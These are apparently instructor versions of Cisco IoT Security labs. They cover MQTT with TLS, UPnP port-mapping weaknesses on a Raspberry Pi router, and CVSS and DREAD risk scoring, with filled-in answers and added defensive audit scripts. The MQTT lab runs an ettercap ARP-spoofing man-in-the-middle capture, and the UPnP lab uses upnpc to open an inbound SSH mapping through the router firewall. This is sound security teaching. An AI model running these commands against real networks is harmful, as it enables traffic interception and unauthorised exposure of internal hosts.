pi@broker:~ $ chmod u+x generate-CA.sh
pi@broker:~ $ ./generate-CA.sh
Generating a 2048 bit RSA private key
........+++
......................+++
writing new private key to './ca.key'
-----
Created CA certificate in ./ca.crt
<output omitted>
c. Now you should have a server certificate and a CA certificate. For the subscriber and publisher to establish
connections using the previously created certificates, the CA certificate must also be copied to the
subscriber and publisher. You can copy the certificate securely from the broker to the clients using the
command scp.
pi@broker:~ $ scp ca.crt pi@203.0.113.13:/home/pi
pi@203.0.113.13's password:
ca.crt 100% 1330 934.4KB/s 00:00
d. Repeat the secure file copy for the other client.
pi@broker:~ $ scp ca.crt pi@203.0.113.12:/home/pi
e. Copy the mosquitto configuration file named mosquitto_tls.conf from the scripts folder to the current
working directory.
pi@broker:~ $ cp /home/pi/notebooks/Course\ Materials/4.\ IoT\ Security/scripts/mosquitto_tls.conf .

Step 2: MITM attack using Kali

a. Start the broker service using the TLS configuration file.
pi@broker:~ $ mosquitto -v -c mosquitto_tls.conf
b. Use the following commands to test sending messages via TLS. Open the subscriber.
pi@subscriber:~ $ mosquitto_sub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user --cafile ca.crt
Client mosqsub/16213-raspberry sending CONNECT
Client mosqsub/16213-raspberry received CONNACK
Client mosqsub/16213-raspberry sending SUBSCRIBE (Mid: 1, Topic: cisco/iots/user, QoS: 0)
Client mosqsub/16213-raspberry received SUBACK
Subscribed (mid: 1): 0
c. Launch the publisher to deliver the required message.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user -m "This message has been sent over MQTT and TLS." --cafile ca.crt
Client mosqpub/16451-raspberry sending CONNECT
Client mosqpub/16451-raspberry received CONNACK
Client mosqpub/16451-raspberry sending PUBLISH (d0, q0, r0, m1, 'cisco/iots/user', ... (44 bytes))
Client mosqpub/16451-raspberry sending DISCONNECT
On the subscriber, the message should arrive shortly.
Client mosqsub/16216-raspberry received PUBLISH (d0, q0, r0, m0, 'cisco/iots/user', ... (44 bytes))
This message has been sent over MQTT and TLS
d. Now, execute a MITM attack as previously and save the captured data.
root@kali:~# ettercap -Tq -i eth0 -M arp:remote //203.0.113.11/ //203.0.113.13/ -w dump_tls.pcap
e. Launch the publisher to deliver the message.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user -m "This message has been sent over MQTT and TLS again." --cafile ca.crt

Step 3: Review the encrypted data using Wireshark.

Open the pcap file created previously and look at the transmitted MQTT messages. Wireshark cannot decode
the MQTT messages because they are protected by the TLS layer, and it shows them as malformed packets.
Can you use only TLS without requiring a username and password?
_______________________________________________________________________________________
_______________________________________________________________________________________
No, because simple TLS provides only server-side authentication, not client authentication.
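The answer above is a property of the broker configuration: with only cafile/certfile/keyfile set, clients verify
the broker but the broker verifies nobody, so a password_file is still needed; with require_certificate true
the broker also demands a client certificate and can use its identity in place of a username. The audit
routine below is an added example, not part of the Cisco lab or of Mosquitto, and does not reproduce the
lab's mosquitto_simple_pass.conf or mosquitto_tls.conf files; the three sample configurations are constructed.
The option names it checks (listener, allow_anonymous, password_file, cafile, certfile, keyfile,
require_certificate, use_identity_as_username) are real mosquitto.conf options.

```python
"""Audit a mosquitto.conf for the weaknesses this lab exercises: anonymous access,
clear-text listeners, and TLS that authenticates only the server. Constructed
example; not Cisco's or Mosquitto's code. The sample configs are constructed too."""

WEAK_CONF = """\
# constructed: plain TCP listener, anyone may connect (the Part 2 setup)
listener 1883
allow_anonymous true
"""

TLS_SERVER_ONLY_CONF = """\
# constructed: TLS plus password file, but the broker never checks a client cert
listener 8883
cafile /etc/mosquitto/ca_certificates/ca.crt
certfile /etc/mosquitto/certs/broker.crt
keyfile /etc/mosquitto/certs/broker.key
allow_anonymous false
password_file /etc/mosquitto/passwords
"""

HARDENED_CONF = """\
# constructed: mutual TLS, the client certificate's CN becomes the username
listener 8883
cafile /etc/mosquitto/ca_certificates/ca.crt
certfile /etc/mosquitto/certs/broker.crt
keyfile /etc/mosquitto/certs/broker.key
require_certificate true
use_identity_as_username true
allow_anonymous false
"""

# Options that mosquitto applies to the most recently declared listener.
LISTENER_KEYS = {"cafile", "certfile", "keyfile", "require_certificate", "use_identity_as_username"}


def parse_mosquitto_conf(text):
    """Return (global_options, listeners). Each listener is a dict holding its
    port plus the TLS options that followed its 'listener' line."""
    options, listeners = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        value = value.strip()
        if key == "listener":
            listeners.append({"port": value.split()[0]})
        elif key in LISTENER_KEYS and listeners:
            listeners[-1][key] = value
        else:
            options[key] = value
    return options, listeners


def audit(text):
    """Return a list of human-readable findings; an empty list means no issue found."""
    options, listeners = parse_mosquitto_conf(text)
    findings = []
    if options.get("allow_anonymous") != "false":
        findings.append("allow_anonymous is not set to false: unauthenticated clients may connect")
    mutual_tls = any(l.get("require_certificate") == "true" for l in listeners)
    if "password_file" not in options and not mutual_tls:
        findings.append("no password_file and no require_certificate: clients are never authenticated")
    for l in listeners:
        port = l["port"]
        if "certfile" not in l or "keyfile" not in l:
            findings.append("listener %s has no certfile/keyfile: MQTT, including CONNECT "
                            "credentials, is sent in clear text" % port)
        elif l.get("require_certificate") != "true":
            findings.append("listener %s uses server-only TLS: the broker does not authenticate "
                            "clients, so a password_file (or client certificates) is still required" % port)
    return findings


if __name__ == "__main__":
    for name, conf in [("weak", WEAK_CONF), ("tls-server-only", TLS_SERVER_ONLY_CONF),
                       ("hardened", HARDENED_CONF)]:
        print(name, audit(conf) or ["ok"])
```

The TLS_SERVER_ONLY_CONF case is the situation the question above describes: the traffic is encrypted, but
authentication still rests on the username and password, so dropping the password_file would reopen the
broker to anyone holding the public ca.crt.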

Part 5: Clean Up
You will remove the files that were created in the lab and return the user settings to the state before this lab,
unless instructed otherwise by your instructor.
a. In the Kali VM, remove all the pcap files from the root user’s home directory.
root@kali:~# rm *.pcap
b. Use Ctrl+C in the broker and subscriber terminals to terminate the MQTT processes.
c. For the publisher and the subscriber, remove the TLS certificates.
pi@publisher:~$ rm ca.crt
rm: remove write-protected regular file 'ca.crt'? yes
d. For the broker, remove all the certificates and mosquitto configuration files in the pi user’s home directory.
pi@broker:~$ rm ca.* *.conf localhost.* *.sh passwords
rm: remove write-protected regular file 'ca.crt'? yes
rm: remove write-protected regular file 'ca.key'? yes
rm: remove write-protected regular file 'localhost.crt'? yes
rm: remove write-protected regular file 'localhost.key'? yes
e. For the broker, restore the file permission for the mosquitto.log file.
pi@broker:~$ sudo chmod 644 /var/log/mosquitto/mosquitto.log
f. For the broker, remove the user pi from the mosquitto group.
pi@broker:~$ sudo deluser pi mosquitto
Removing user `pi' from group `mosquitto' ...
Done.

Lab – UPnP Vulnerabilities (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.

Lab Topology

Connectivity requirements. As shown in the topology, the Raspberry Pi will be configured as a wireless client and
a wired router, requiring a second network connection. The Raspberry Pi and the PL-App/Kali host can be directly
connected. The switch is included in the topology to indicate that the Raspberry Pi could act as a gateway to an
entire network of hosts in its role as router between the internal and external networks.

Addressing
The Pi will acquire an address from the external network, while providing addresses to the internal network.

Objectives
Part 1: Configuring the Raspberry Pi as a wired router using a BASH script
Part 2: Connecting a Client to the Raspberry Pi
Part 3: Testing Ports using UPnP

Background / Scenario
Many home routers are Linux-based. To ease connectivity challenges, they offer services such as DHCP,
NAT, UPnP, and more. They also offer both wired and wireless connections to the local network while
protecting users from threats from the Internet. Unfortunately, these routers can be tricked to open various
ports that will permit access to the internal network by threat actors from the Internet.
In this lab, you will turn a Raspberry Pi into a working router. Unlike most routers, the Raspberry Pi will
connect to the network wirelessly using PL-App, and route wireless traffic into a local wired Ethernet network.
A client will be added and connectivity will be tested. The client will then use Universal Plug and Play (UPnP)
to open a communication port through the router without authentication.


Required Resources
• PC or laptop
• IoTSec Kali VM
• 8 GB Micro SD card (minimum required) with PL-App installed
• Raspberry Pi 3, Model B or later
• A wireless network connection
• Ethernet cables
• A switch
Predictable network interface names containing MAC addresses are becoming increasingly common.
Because they may break the script used in this lab, raspi-config may be used to transition back to traditional
interface names (eth0, eth1, wlan0, etc.). To learn more, read the following:
https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/

Part 1: Configuring the Raspberry Pi as a wired router using a BASH script

Step 1: Configure the PL-App image to connect to your WiFi network.

a. Connect the devices as shown in the topology diagram.
b. Start the DHCP services on the IoTSec Kali VM as necessary.
root@kali:~# lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
c. Determine the IP address of the Raspberry Pi device.
d. Open a web browser in IoTSec Kali VM and navigate to the IP address of your Raspberry Pi device.
e. In the upper right-hand corner, click the Config icon (looks like a gear).

f. Enter the information for the SSID and password of your wireless network. Click OK to continue. Click
Yes when prompted to continue making changes to config. The SSID and password may be provided by
your instructor.
g. Open a terminal from the PL-App. Enter ifconfig to verify that the Raspberry Pi device is connected to the
WiFi network.
(pl-app) root@myPi:/home/pi/notebooks# ifconfig
<output omitted>
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.201 netmask 255.255.255.0 broadcast 192.168.11.255
inet6 fe80::7859:df95:f2de:59f2 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:38:e8:65 txqueuelen 1000 (Ethernet)
RX packets 71 bytes 6193 (6.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 383 bytes 42370 (41.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


Step 2: Run the BASH script

In this step, you will run a BASH script that prepares your Raspberry Pi to act as a router between the wired
and wireless networks.
a. Navigate to the scripts directory.
(pl-app) root@myPi:/home/pi/notebooks# cd /home/pi/notebooks/Course\ Materials/4.\ IoT\ Security/scripts/
If desired, you can use the command PROMPT_DIRTRIM=1 to make the prompt shorter for the current
terminal.
(pl-app) root@myPi:/home/pi/notebooks/Course Materials/4. IoT Security/scripts # PROMPT_DIRTRIM=1
b. Use ls -l to view the attributes of the script file. If it is not executable, use chmod +x to change the
attributes of the file.
(pl-app) root@myPi:.../scripts# chmod +x WiFiPi.sh
c. Run the BASH script by invoking its name from the current folder.
(pl-app) root@myPi:.../scripts# ./WiFiPi.sh
d. Follow the directions and your instructor’s guidance to turn the Raspberry Pi into a wired or wireless
router.
e. Wait for the Pi to reboot. You will lose network connectivity to your Raspberry Pi device.

Part 2: Connecting a Client to the Raspberry Pi

In this part of the lab, you will configure the Raspberry Pi to work as a router between the wired internal
network and the wireless external network.
a. Open a web browser in IoTSec Kali VM and navigate to the Pi at 203.0.113.254. Log in to PL-App.
b. Open a new terminal on the Pi and issue the ifconfig command. You should see the following:
(pl-app) root@myPi:/home/pi/notebooks# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 203.0.113.254 netmask 255.255.255.0 broadcast 0.0.0.0
ether b8:27:eb:61:08:42 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
<some output omitted>
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.201 netmask 255.255.255.0 broadcast 192.168.11.255
inet6 fe80::f377:c15:ba37:bb1 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:34:5d:17 txqueuelen 1000 (Ethernet)
RX packets 2040 bytes 397045 (387.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1815 bytes 1632892 (1.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Note: The address displayed above, 192.168.11.201/24, will vary depending on the configuration of your WiFi
network.


Part 3: Testing Ports using UPnP

Step 1: Start the Linux Internet Gateway Device (IGD) service.

a. In the PL-App terminal that is open in the Kali VM browser, view the status of the Linux IGD service.
(pl-app) root@myPi:/home/pi/notebooks# systemctl status linux-igd
linux-igd.service - LSB: UPnP Internet Gateway Device
Loaded: loaded (/etc/init.d/linux-igd; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:systemd-sysv-generator(8)
b. If the Linux IGD service is not running, as shown in the output above, start the service.
(pl-app) root@myPi:/home/pi/notebooks# systemctl start linux-igd
c. If necessary, confirm the status of the Linux IGD service.
(pl-app) root@myPi:/home/pi/notebooks# systemctl status linux-igd
● linux-igd.service - LSB: UPnP Internet Gateway Device
Loaded: loaded (/etc/init.d/linux-igd; disabled; vendor preset: enabled)
Active: active (running) since Thu 2018-05-24 23:52:31 UTC; 7s ago
Docs: man:systemd-sysv-generator(8)
Process: 1059 ExecStart=/etc/init.d/linux-igd start (code=exited, status=0/SUCCESS)
CGroup: /system.slice/linux-igd.service
└─1067 /usr/sbin/upnpd wlan0 eth0

May 24 23:52:31 pi systemd[1]: Starting LSB: UPnP Internet Gateway Device...
May 24 23:52:31 pi linux-igd[1059]: Starting Linux IGD Daemon: linux-igd.
May 24 23:52:31 pi systemd[1]: Started LSB: UPnP Internet Gateway Device.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 UPnP SDK Successfully Initialized.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 Successfully set the Web Server Root Directory.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 IGD root device successfully registered.
May 24 23:52:31 pi upnpd[1067]: 0x76fd54b0 Advertisements Sent. Listening for requests ...

Step 2: Verify open ports and create a new mapping using Linux.
A router should isolate the Internet from the LAN behind it. Ideally devices on the Internet would not be able to
open connections to devices in the LAN behind the router. UPnP allows an internal device to ask the router to
open a port in its firewall, allowing devices out on the Internet to reach the internal device. While there are a
few special cases where this is desirable, more often than not, allowing internal devices to use UPnP to open
ports is bad practice.
In this step, we will use the iptables Linux kernel firewall utility to observe the behavior of UPnP on the Pi.
a. Use the following commands on the Raspberry Pi to determine the open ports and view the routing
tables. Document the number of open ports.
(pl-app) root@myPi:/home/pi/notebooks# iptables -S
-P INPUT ACCEPT


-P FORWARD ACCEPT
-P OUTPUT ACCEPT
<some output omitted>
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
b. Use the netstat -tuna command to list the services (and their ports) running on the Pi.
(pl-app) root@myPi:/home/pi/notebooks# netstat -tuna
Is there a service running on port 49152? What service often listens to that port? Perform a Google
search and record your answer below.
____________________________________________________________________________________
____________________________________________________________________________________
Yes, a service is running on port 49152. Research on the Internet shows that Linux IGD uses port 49152
to run UPnP. In addition, research shows that the only standard port for UPnP is UDP port 1900. It is also
open on the Pi.
c. Before upnpc in the Kali VM can communicate with the Raspberry Pi, you must create a default route
pointing to the Pi. In the Kali VM, enter the following command:
root@kali:~# ip route add default via 203.0.113.254
Instructor Note: This default route should NOT be necessary as the Pi and Kali belong to the same
network. However, because of an upnpc implementation decision, communication cannot be established
without a default route.
d. In a terminal on the IoTSec Kali VM, you will use upnpc to simulate an internal UPnP-ready device.
upnpc is a UPnP client. Use the upnpc command to create a port mapping on the Raspberry Pi router.
In this case, the client’s IP is 203.0.113.1 (Kali’s IP). The command requests that the router expose the
client’s SSH port (port 22) to the Internet as port 1337, much as an IoT device would.
root@kali:~# upnpc -a 203.0.113.1 22 1337 tcp
upnpc : miniupnpc library test client, version 2.0.
(c) 2005-2017 Thomas Bernard.
Go to http://miniupnp.free.fr/ or https://miniupnp.tuxfamily.org/
for more information.
List of UPNP devices found on the network :
desc: http://203.0.113.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
Found a (not connected?) IGD : http://203.0.113.254:49152/upnp/control/WANIPConn1
Trying to continue anyway
Local LAN ip address : 203.0.113.1
ExternalIPAddress = 192.168.11.201
InternalIP:Port = 203.0.113.1:22
external 192.168.11.201:1337 TCP is redirected to internal 203.0.113.1:22 (duration=0)
e. Return to the terminal that is open on the Raspberry Pi in PL-App. Note the change in the IP tables and
ports of the Raspberry Pi router by repeating the commands from step a.
(pl-app) root@myPi:/home/pi/notebooks# iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
<some output omitted>
-A FORWARD -d 203.0.113.1/32 -p tcp -m tcp --dport 22 -j ACCEPT
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
The UPnP service on the Kali VM has opened a port in the firewall of the Raspberry Pi gateway device.
The new port mapping will now allow an attacker to communicate with a listening IoT device inside of a
network. An IoT device could do much the same by using UPnP to open a port so that an Internet
application could communicate with the device. A user may not be aware that the router firewall has been
reconfigured in this way.
f. You can also use Miranda, a Kali tool, to discover, query, and interact with UPnP-enabled devices.
For more information about Miranda, navigate to https://tools.kali.org/information-gathering/miranda.
g. In a terminal on IoTSec Kali VM, enter miranda.
root@kali:~# miranda
h. At the upnp> prompt, enter msearch to discover UPnP-enabled devices on the network. Press Ctrl+C to
stop the search.
What is the IP address of the UPnP device? What version of UPnP is used by the UPnP-enabled device?
____________________________________________________________________________________
The IP address of the UPnP device is 203.0.113.254 as configured in the WiFiPi script. At this time, it is
using UPnP version 1.0.
i. To find out more information about the UPnP device, enter host list at the prompt.
upnp> host list

[0] 203.0.113.254:49152
j. Using the ID provided by the list in [ ], enter host get 0 to request more information in this example. Then
enter host summary 0 to display the results.
upnp> host get 0

Requesting device and service info for 203.0.113.254:49152 (this could take a few seconds)...

Failed to retrieve actions from service actions list for service urn:schemas-dummy-com:service:Dummy:1!
Host data enumeration complete!

upnp> host summary 0

Host: 203.0.113.254:49152
XML File: http://203.0.113.254:49152/gatedesc.xml
<output omitted>
k. Type exit to leave miranda.
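The change you observed in step e is the whole point of the lab: a single UPnP request from an internal host
inserted a FORWARD rule that accepts unsolicited traffic from the Internet to that host, and nothing in the
router's user interface reports it. A router administrator can catch such mappings by comparing the output of
iptables -S over time. The routine below is an added example, not part of the Cisco lab or of linux-igd; its
"before" sample is the rule set shown in step a, its "after" sample is the rule set shown in step e plus a
second, constructed mapping to 203.0.113.20:80.

```python
"""Find UPnP-style inbound port mappings in 'iptables -S' output: FORWARD rules
that accept traffic to one LAN host by destination port without a
RELATED,ESTABLISHED state match. Constructed example; not Cisco's code."""
import shlex

IPTABLES_BEFORE = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
"""

# Rules from step e plus one constructed extra mapping (203.0.113.20:80).
IPTABLES_AFTER = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A FORWARD -d 203.0.113.1/32 -p tcp -m tcp --dport 22 -j ACCEPT
-A FORWARD -d 203.0.113.20/32 -p tcp -m tcp --dport 80 -j ACCEPT
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
"""


def parse_rules(text):
    """Turn each '-A <chain> ...' line into a dict of option -> value
    (flags without an argument get the value True). '-P' policy lines are skipped."""
    rules = []
    for line in text.splitlines():
        tokens = shlex.split(line)
        if len(tokens) < 2 or tokens[0] != "-A":
            continue
        rule = {"chain": tokens[1], "raw": line}
        i = 2
        while i < len(tokens):
            flag = tokens[i].lstrip("-")
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                rule[flag] = tokens[i + 1]
                i += 2
            else:
                rule[flag] = True
                i += 1
        rules.append(rule)
    return rules


def inbound_port_mappings(text, lan_prefix="203.0.113."):
    """Return (host, proto, port) for every FORWARD ACCEPT rule that targets a
    single LAN host by port and is not limited to RELATED,ESTABLISHED traffic:
    the shape of rule that upnpd adds for a UPnP AddPortMapping request."""
    found = []
    for r in parse_rules(text):
        if r["chain"] != "FORWARD" or r.get("j") != "ACCEPT":
            continue
        dst = r.get("d", "")
        if not dst.startswith(lan_prefix) or "dport" not in r or "state" in r:
            continue
        found.append((dst.split("/")[0], r.get("p"), int(r["dport"])))
    return found


def new_mappings(before, after):
    """Mappings present in 'after' but not in 'before': what changed since the baseline."""
    return sorted(set(inbound_port_mappings(after)) - set(inbound_port_mappings(before)))


if __name__ == "__main__":
    for host, proto, port in new_mappings(IPTABLES_BEFORE, IPTABLES_AFTER):
        print("new inbound mapping: %s/%d -> %s" % (proto, port, host))
```

On the Pi itself the baseline would come from a saved copy of iptables -S, and the comparison can run from
cron; on a commercial home router the equivalent check is the UPnP port-mapping table in its web interface,
and the simplest mitigation is the one the Reflection asks about: turn UPnP off.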

Step 3: Restore to the default configurations.

a. Remove the additional default route from IoTSec Kali VM.
root@kali:~# ip route del default via 203.0.113.254
b. In the PL-App terminal, navigate to the scripts directory if necessary.
(pl-app) root@myPi:/home/pi/notebooks# cd Course\ Materials/4.\ IoT\ Security/scripts/
c. Use chmod +x to add the execute attribute to the cleanup file.
(pl-app) root@myPi:.../scripts# chmod +x Cleanup_WiFiPi.sh
d. Run the BASH script by invoking its name from the current folder.
(pl-app) root@myPi:.../scripts# ./CleanUp_WiFiPi.sh
e. The Raspberry Pi device will receive an IP address from the DHCP server that is running on IoTSec Kali
VM. Determine the assigned IP address.
Using a web browser on the IoTSec Kali VM, navigate to the Raspberry Pi. Verify that the dnsmasq, linux-igd
and WiFiPi services are stopped.
(pl-app) root@myPi:/home/pi/notebooks# systemctl status dnsmasq
(pl-app) root@myPi:/home/pi/notebooks# systemctl status linux-igd
(pl-app) root@myPi:/home/pi/notebooks# systemctl status WiFiPi
Note: Make sure students disable the services after they finish the lab. Dnsmasq and linux-igd could create
problems in other labs if left running.
Note: If students were unable to access the Raspberry Pi after reboot, the microSD card may need to be
reimaged. The Raspberry Pi can still be accessed directly via HDMI; however, network access will need to be
configured and the original /etc/dnsmasq.conf, /etc/network/interfaces and /etc/dhcpcd.config can be copied
from another Raspberry Pi device and replace the affected files.

Reflection
1. What is UPnP commonly used for in home networks?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
UPnP simplifies the setup of many home network devices such as printers, media servers, IoT devices and
digital assistants.
2. Consider your home network connection. Is UPnP running? What can be done to turn this service off?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary because students' home networks differ.
3. How can an attacker using a vulnerable IoT device take advantage of a UPnP-enabled router?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________


Answers will vary. The key here is that attackers can use compromised IoT devices as UPnP clients and
expose internal devices to the Internet.

Lab - Using the CVSS (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will use the CVSS to determine the severity level of a vulnerability.
Part 1: Researching the Details of the CVSS Metrics Used to Compute the CVSS Score
Part 2: Using the CVSS Calculator to Determine the Severity Level of a Vulnerability
Part 3: Reflecting on the Use and Results of the CVSS Calculator

Background / Scenario
CVSS refers to the Common Vulnerability Scoring System. It is a vendor-neutral, industry standard that offers
an open framework for conveying the severity of vulnerabilities. It helps to determine the urgency and priority
of responses to vulnerabilities. The CVSS model is designed to provide users with an overall composite score
representing the severity and risk of a vulnerability.
The results of a CVSS calculation are based on metrics and formulas. The metrics are in three distinct
categories that can be quantitatively or qualitatively measured.
This lab will provide you with a security vulnerability scenario, and it will be your job to use the CVSS
calculator and specification document to determine what the Base Score is.

Required Resources
• PC or mobile device with Internet access

Part 1: Researching the Details of the CVSS Metrics Used to Compute the CVSS Score
To use the CVSS risk assessment scoring system, it is important to understand each of the metrics that are
used in the calculation. The Forum of Incident Response and Security Teams (FIRST) has been designated
as the custodian of the CVSS to promote its adoption globally. Their specification document is very useful in
helping to understand each of the metrics. The following URL describes the metrics used when calculating a
CVSS score:
https://www.first.org/cvss/specification-document
a. Navigate to the CVSS specification document link provided above. Use this resource to answer the
questions below.
List the three metric groups and briefly describe each of them.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Base – represents the characteristics of a vulnerability that are constant over time and across contexts.
The Base metric is further broken down into the Exploitability and Impact metrics.


Temporal – Measures the characteristics of a vulnerability that may change over time, but not across user
environments.
Environmental – This measures the aspects of a vulnerability that are rooted in a specific organization’s
environment.
What is the first metric used in the Base Metrics calculation? Describe the metric and all of the possible
values for this metric.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Attack Vector (AV) – Reflects the proximity of the threat to the vulnerable component. The more remote
the threat, the higher the severity.
Metric values: Network – the vulnerable component is reachable through OSI layer 3; this value implies that
it is remotely exploitable. Adjacent – the vulnerable component is reached through the network, but the
attacker is bound to the same shared physical or logical network and cannot reach it past a Layer 3
boundary (router). Local – the attacker is likely logged in locally. Physical – the attacker must be able to
physically touch or manipulate the vulnerable component.
What is the difference between the High (H) and Low (L) values for the Attack Complexity (AC) metric?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The Low value indicates that specialized access conditions do not exist. An attacker can expect success
against the vulnerable component. The High value means that a successful attack depends on conditions
beyond the attacker’s control.
b. Read through the remaining metrics and their possible values for each of the components of the Base
Metrics. Knowing where to find this information will be required for the next part of this lab.

Part 2: Using the CVSS Calculator to Determine the Severity Level of a Vulnerability
Use the following scenario to determine the Base Score using the CVSS. Refer back to the CVSS
Specification document for the details regarding each of the required metrics used for this calculation.
Peter is a network manager for XYZ Corporation and has just documented a vulnerability with an IoT device.
XYZ Corp uses IoT devices in their manufacturing facility for monitoring and management of a wide variety of
equipment. During a security audit, a backdoor was discovered on an IoT device. Security logs indicate that
the IoT device has been routinely accessed remotely from outside of the company’s network. It appears that
the hackers can gain access whenever they would like without any required privileges to this IoT device. It
does not appear that any user interaction was required for this attack to occur. The scope of this vulnerability
is local. That is, no other components were impacted. The IoT device did not store or communicate any
confidential information and therefore, there was no loss of confidentiality with this vulnerability. However, the
attacker had access to information communicated to and from the device which appears to have been altered.
Although the attacker did not do anything to impact availability to this device, it does appear that the hackers
can take it offline.


For this part, we will use the CVSS Calculator from FIRST.org:
https://www.first.org/cvss/calculator/3.0
a. Navigate to the link for the calculator.
b. Select the appropriate values based on the description above for the Base Score.
What is the Base Score for the vulnerability described above?
____________________________________________________________________________________
____________________________________________________________________________________
Base Score: 9.1 (Critical) – CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Part 3: Reflecting on the Use and Results of the CVSS Calculator

Reflect on how this vulnerability should be handled to mitigate or minimize its impact. Do research as
necessary using the Internet.
a. How should an organization handle a vulnerability with this score?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
A score with a critical level usually indicates an immediate response.
b. Experiment with changing the values. What would happen if the Attack Vector required physical access?
How would this change the score?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The Base Score changes from 9.1 (Critical) to 6.1 (Medium).
c. Is it possible to select any combination of metrics that would result in a score greater than 0.0 if
Confidentiality, Integrity, and Availability had a value of “None”?
____________________________________________________________________________________
____________________________________________________________________________________
No.

Lab – Assess Risk with DREAD (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will use the DREAD risk assessment model to assess risk.
Part 1: Using the DREAD Scoring System to Assess Risk
Part 2: Using the DREAD System to Assess the Risk of a Described Vulnerability
Part 3: Reflecting on the Use of the DREAD Scoring System

Background / Scenario
DREAD is a risk assessment model used to quantify the risk associated with security threats. It is not a
vulnerability assessment tool, but it is part of the risk assessment. Risks and vulnerabilities differ because
risks are vulnerabilities that have been evaluated in the context of an organization based on previous attacks.
The same vulnerability may present vastly different levels of risk depending on the nature of the organization.
There are 5 categories used to compute the result:
o Damage Potential – If the threat is exploited, what is the damage potential?
o Reproducibility – How reproducible is the vulnerability?
o Exploitability – How difficult is it for the vulnerability to be exploited?
o Affected Users – What is the scale of the attack? How many users are affected by this vulnerability?
o Discoverability – How difficult is it to discover the attack?
There are multiple ways to score the DREAD risk assessment model. Microsoft uses a scoring system of 1, 2,
or 3, with 3 indicating the highest risk for each category (STRIDE). However, for this lab, we will use the
scoring system described by OWASP at the following link:
https://www.owasp.org/index.php/Threat_Risk_Modeling#DREAD
OWASP uses a scoring system of 0, 5, or 10 for each category with 10 indicating a more serious risk, and 0
indicating no risk. Discoverability is the only category that offers an additional option of 9. It is important to
refer back to this document when scoring each category for Part 1 of this lab.

Required Resources
• PC or mobile device with Internet access

Part 1: Using the DREAD Scoring System to Assess Risk


For this lab, use any news website or popular and reputable website that reports technology related news.
a. Navigate to the OWASP DREAD link: https://www.owasp.org/index.php/Threat_Risk_Modeling#DREAD
b. Read through the DREAD risk classification system and how to score each of the categories.
How would you score a threat that requires advanced programming and network knowledge to exploit it?
____________________________________________________________________________________
0


How would you score a threat that if exploited would cause complete system or data destruction?
____________________________________________________________________________________
10
How would you score a threat that anyone can find the details on how to exploit by using a search
engine?
____________________________________________________________________________________
9

Part 2: Using the DREAD System to Assess the Risk of a Described Vulnerability
Use the following scenario to assess the risk of a threat using the DREAD risk assessment method. Refer
back to the OWASP DREAD link as needed for the details of how to score each category.
Jose is a security engineer for XYZ Corporation and has just discovered a threat to an IoT device. XYZ
Corp uses IoT devices in their manufacturing facility for monitoring and management of a wide variety of
